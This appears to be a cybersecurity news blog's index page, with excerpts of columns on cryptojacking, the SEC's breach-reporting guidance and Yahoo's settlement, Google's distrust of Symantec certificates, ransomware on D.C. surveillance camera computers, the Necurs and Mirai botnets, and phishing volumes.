Home Podcasts Videos Guest Posts Q&A My Take Bio Contact

MY TAKE: Why ‘crypto-jacking’ is spreading faster than ransomware — and may be more insidious

By Byron V. Acohido

Has there ever been anything more tailor made for hackers than crypto currency? Is anyone surprised that hackers are innovating ways to crack into digital wallets and currency exchanges?

In January, hackers absconded with some 58 billion Japanese yen worth of the XEM cryptocurrency from Tokyo-based Coincheck Exchange. That’s a cool $533 million in U.S. dollars.

Related article: Crypto miners achieve a breakthrough

Meanwhile, con artists have commenced  scamming unwitting victims into forking over their joyfully earned digital coins. Those smiles can quickly turn to frowns if the crypto coin holder gets fooled into doing any transactions on spoofed websites, sporting website addresses that look just like the authentic URLs of some popular cryptocurrency exchange sites, like Binance and Bittrex.

However there is an even more insidious malicious activity that is on the verge of disrupting business networks at an unprecedented scale: the dispersal of crypto mining malware for the purposes of crypto jacking.

New heights of innovation

Not only is this type of hacking activity taking off like a rocket – it is driving hackers to new heights of innovation. Hacking collectives are directing the latest, greatest hacking techniques to to uploading crypto mining code on PCs and servers inside business networks. They are:

•Repurposing classic botnets, as well as assigning IoT botnets to crypto mining chores.

•Using stolen NSA cyber weapons, like the ones used in the WannaCry ransomware wave, to accelerated mining activities

•Seeking out and tapping into well-known vulnerabilities in Windows and  Linux open source admin tools to aid these endeavors.


“Crypto mining malware is becoming attackers popular mode of operation regardless of their targets, says Nadav Avital, security researcher at network security firm Imperva. “Crypto mining attacks are directed at any machine that has a public interface to the internet, weather it is a MySQL server, Apache server or a file server.” (more…)

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someone

MY TAKE: Why the SEC’s reporting guidance, Yahoo’s $80M payout will shake up board rooms

By Byron V. Acohido

The most encouraging thing about the U.S. Securities and Exchange Commission formally issuing cybersecurity reporting “guidance” for public companies last month was, ironically, commissioner Kara Stein’s disappointment that her colleagues did not go much further.

Related video: Howard Schmidt’s 2015 observations on board involvement

Stein said she would have liked to have seen the commission do a lot more than rehash staff-written best practices suggestions that have been laying around since 2011. Her assertive stance resonated just a few days later when Yahoo agreed to settle a milestone securities case, for a cool $80 million.

Data thieves stole personal records for 1 billion individuals from Yahoo. So now the portal giant will pay a legal settlement that’s more than four times the $18.5 million payout Target had to cough up losing data for  41 million customers.

Yahoo’s poor practices — neglecting to  encrypt and sufficiently protect data; failing to detect and disclose the breach in a timely manner; bulling ahead with the sale to Verizon — resulted in exponentially more victims than Target.

More crucially, unlike the Target case, the Yahoo case was pressed by plaintiff’s attorneys representing consumers  in securities-related lawsuit. (Attorney generals from 47 states sued Target.)  And the private attorneys hit the jackpot. In addition the $80 million for injured consumers, the plaintiffs’ attorneys have asked the court to order Yahoo to pay $20 million in legal fees, and up to $750,000 as reimbursement for other work.expenses.

Buck stops with board

Together the SEC’s freshly-minted advice, the Yahoo settlement shines a bright light on D&O liability. It’s now crystal clear that board directors and senior executives can be held accountable for any major data breach that occurs on their watch. …more

MY TAKE: Why Google is labeling websites ‘unsafe’ — what publishers need to do about it

By Byron V. Acohido

One of the things Google’s security honchos have long championed – for the most part out of the public spotlight  — is to make HTTPS Transport Layer Security (TLS) the de facto standard for preserving the integrity of commercial websites.

TLS and its predecessor, Secure Sockets Layer, (SSL), rely on digital certificates to validate that a website is really what it claims to be. In an environment where spoofed and booby-trapped websites have come to clutter the Internet, this is a vital function.

Related article: How the PKI ecosystem can secure IoT

TLS also leverages public key infrastructure (PKI) encryption to protect the data submitted by users at legit sites. Companies, known as Certificate Authorities (CAs,) play a pivotal role issuing TLS certificates and assisting website owners with implementation of PKI.

For the most part, this arrangement has worked very well, although, like anything else in security, it can be improved. On March 15, Google will take a bold step to strengthen TLS – it will advance the process of ending trust in hundreds of thousands of TLS certificates issued by Symantec, the former kingpin CA. With the release of the beta and stable versions of Chrome 66, Google will begin issuing “distrust” alerts to those who visit web sites using any Symantec-rooted certificates issued prior to June 1, 2016.

Engendering trust

Starting Thursday, March 15, this could play out as a rude awakening for web site publishers who haven’t been paying attention. However, the good news is that, thanks to the sudden — and remarkably smooth — handoff of Symantec’s digital certificate …more

GUEST ESSAY: Surveillance cam hack shows potential for ransomware collateral damage

By David Smith

The recent charges, and subsequent arrest, of two Romanians alleged to be responsible for a widespread hack of surveillance cameras in our nation’s capitol raises a number of intriguing questions.

Why hack surveillance cameras? What nefarious activity might escape law enforcement’s notice while these particular cameras went dark?

Related articles: Surveillance cams are trivial to hack

The U.S. Secret Service had every right to be alarmed with the sudden compromise of so many cameras around Washington D.C.  According to an affidavit from the case, the hackers “participated in an intrusion into and taking control of approximately 123 internet-connected computers used by the Metropolitan Police Department of the District of Columbia (“MPDC”) to operate surveillance cameras … which computers could then be used to send the ransomware-laden spam emails.”

Based on this assertion, it appears the computers controlling the cameras were the hackers’ target objective — not the cameras themselves. This is an important distinction.  It would seem that the Romanian hackers were not ideologues seeking to make a political point. In fact, it appears they had no interest, at all, in the basic functions served by the hacked cams.

It is likely that they simply found vulnerable systems, which happened to be cameras, and then swiftly infected them with ransomware. In that scenario, they hoped for a quick ransom payment by the owners of the underlying computers. And while the attackers controlled these computers, the systems could also be redirected to help spread ransomware to other systems and devices.

Material harm

Sen. Mark Warner, D-Virg., hit the nail on the head when he observed: “These reports highlight just how vulnerable our systems are to fast-proliferating ransomware threats.” In this situation, the affected devices just happened to be surveillance cameras. Aside from the time and effort necessary to remove the ransomware and bring the systems back online, no other reported harm came from the cameras going dark for a period of time. …more

MY TAKE: Necurs vs. Mirai – what ‘classic’ and ‘IoT’ botnets reveal about evolving cyber threats

By Byron V. Acohido

I’ve written about how botnets arose as the engine of cybercrime, and then evolved into the Swiss Army Knife of cybercrime. It  dawned on me very recently that botnets have now become the bellwether of cybercrime.

This epiphany came after checking in with top experts at Proofpoint, Forcepoint, Cloudflare and Corero — leading vendors that devote significant talent and resources to monitoring and analyzing botnets. I also spoke with SlashNext, a startup that specializes in detecting stealthy botnet activity.

Related article: Russian botnets ignite social media blitz

There’s much we can discern from the distinctive ebb and flow of botnet-borne malicious activity. ‘Classic’ botnets are comprised of vast numbers of infected PCs, servers and virtual computing nodules. One of particular note is called Necurs, a massive botnet-for-hire and the king of delivering phishing email attacks, ransomware campaigns and Banking Trojans.

Then there are any number of smaller, single-purpose botnets owned and operated by nation-state-backed hacking rings. The obvious example: the Russian botnet operators who orchestrated the wave of social media spoofing and propagandizing designed to influence political discourse and meddle in elections in the U.S. and all across Europe. the most recent example: Russian botnets hyped the hyped the #Releasethememo campaign on Twitter to lend credence to Rep. Devin Nunes’, R-Calif.,  secret ‘memo’ purportedly discrediting and disqualifying the FBI from investigating Russia’s meddling in the last U.S. election. That came after Russian botnets fueled wildly conflicting polling results during the 2016 presidential race, and fabricated 6.1 million Twitter followers for then-candidate Trump.


Meanwhile, a new generation of Internet of Things botnets has arrived on the scene. IoT botnets, like Mirai and Reaper, are comprised of infected home routers, surveillance cameras and other IoT devices. Monitoring the badness emanating from the likes of Necurs, Mirai and Reaper can tell us a lot about where cyber criminals’ attention is focused – and where it might turn next. “The cyber threat landscape is constantly changing; fashions come and go,” observes Carl Leonard, principal security analyst at Forcepoint. “Cyber criminals are always seeking to increase their return on investment and they’re only going to perform an activity if it’s worthwhile for them and if they can still continue to see success over time.”

Botnets for hire

Let’s start with a basic definition and take a look at the aforementioned Necurs, a preeminent botnet, in terms of delivering malicious payloads. A bot is a computing nodule infected with a small bit of coding that causes it to obey instructions from a command and control server. A botnet is a network of thousands upon thousands of bots under control of an attacker. …more

NEWS WRAP-UP: Crypto miners tap hacked websites, achieve monetization breakthrough

By Byron V. Acohido

Week ending March 3, 2018. Cyber criminals have discovered a new pathway to monetization that’s as trouble free as anthything they could have dreamed up: crypto mining on the back of hacked websites. Security vendor Cyren put out results of a study this week showing a 725% spike in the number of websites hosting cryptocurrency mining software in January 2018 as compared to September 2017.

Dark Reading’s Jai Vijayan reports that much of the growth is being fueled by the insane run-up in cryptocurrency prices in recent months. For instance, the value of Monero, the most widely mined cryptocurrency at the moment, increased by 250% during the four-month period when Cyren was monitoring some 500,000 websites.

Related article: Why massive Mirai IoT botnet is so worrisome

Inserting two lines of JavaScript can divert some of a website’s processing capabilities to crypto mining. But to do it at a scale that matters, one would have to control a vast number of websites. It’s trivial for a motivated hacker to find and access vulnerable websites.


“Crypto mining represents a minuscule portion of all web-based malware,” observes Chris Olson, CEO of security consultancy The Media Trust. “It’s just another weapon employed by bad actors. It’s unlikely that any well-known brand or website would knowingly allow their digital asset to be used for cryptomining without clearly communicating it to users.

“The problem is that most websites don’t know they’ve been compromised. The continuing use of cryptomining script underscores the importance of knowing your digital partners and the code they execute in your digital environment.” …more

MY TAKE: A closer look at why ‘carpet bombing’ of phishing email endures

By Byron V. Acohido

Occasionally, examining something in microcosm can be more instructive than trying to absorb  a macro view that overwhelms.

Such is the case with the flurry of cyber attack reports that come out this time of year, analyzing and dissecting what transpired in the threat landscape the previous year. Last week, for instance, Fortinet and Cisco each issued their respective 2016 cyber attack retrospectives.

Related podcast: How faked personas fuel targeting attacks

Fortinet reported organizations facing the highest levels of cyberattacks in both number and sophistication, due in large part to a rise in automated swarm attacks. Exploit detections detected in their customers’ systems were up 82% from the previous quarter. For the full year, Fortinet found malware families growing in both volume, up  25%, and unique variants, up 19%.

Cisco, meanwhile, reported network breaches twice as severe in 2017 vs. 2016, with financial losses in cases reported by CISOs they polled averaging  $500,000 per business. Cisco’s crack researchers also broke down a frightening criminal advances in “burst attack” denial of service campaigns and the weaponization of encryption.

Metrics of maliciousness

Those reports hammer home this reality: the sophistication and variety of cyber threats continues to steadily escalate in lockstep with our increasing reliance on Internet-centric commerce.

Meanwhile, for a micro view, we can look to a couple of other reports — one from the U.S. Department of Defense and  the other examining how local town councils in the English countryside are doing defending hackers.

On any given day, both of these sectors are being carpet bombed by wave upon wave of cyber attacks. The Defense Department, for instance, detects 36 million malware-infested emails arriving from hackers, terrorists and foreign adversaries every 24 hours.

That translates into an onslaught of some 13 billion weaponized emails raining down on Pentagon on an annual basis. We know this thanks to a talk given last month by David Bennett, director of operations for the Defense Information Systems Agency. Bennett addressed the to the Armed Forces Communications and Electronics Association. …more